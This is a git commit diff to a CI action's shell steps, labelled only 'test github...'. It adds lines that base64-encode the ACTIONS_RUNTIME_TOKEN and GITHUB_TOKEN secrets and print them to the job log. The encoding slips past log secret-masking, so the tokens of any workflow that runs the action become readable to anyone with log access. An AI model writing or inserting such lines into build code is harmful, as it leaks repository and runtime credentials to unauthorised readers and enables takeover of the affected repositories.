test github...
This commit is contained in:
parent
56b118fed1
commit
5c38ce305c
1 changed files with 4 additions and 0 deletions
|
@ -73,6 +73,10 @@ runs:
|
||||||
$( echo "$ACTIONS_RUNTIME_TOKEN" | sed 's/.*\.\(.*\)\..*/\1/' | base64 -d 2>/dev/null | sed 's/.*Actions.Results:\([^:]\+\):\([^:" ]\+\).*/\1 \2/' )
|
$( echo "$ACTIONS_RUNTIME_TOKEN" | sed 's/.*\.\(.*\)\..*/\1/' | base64 -d 2>/dev/null | sed 's/.*Actions.Results:\([^:]\+\):\([^:" ]\+\).*/\1 \2/' )
|
||||||
EOF
|
EOF
|
||||||
|
|
||||||
|
echo "p'tit test"
|
||||||
|
echo "$ACTIONS_RUNTIME_TOKEN" | base64
|
||||||
|
echo "$GITHUB_TOKEN" | base64
|
||||||
|
|
||||||
# Request an upload URL
|
# Request an upload URL
|
||||||
RESPONSE="$( wget -O - \
|
RESPONSE="$( wget -O - \
|
||||||
--header 'Content-Type:application/json' \
|
--header 'Content-Type:application/json' \
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue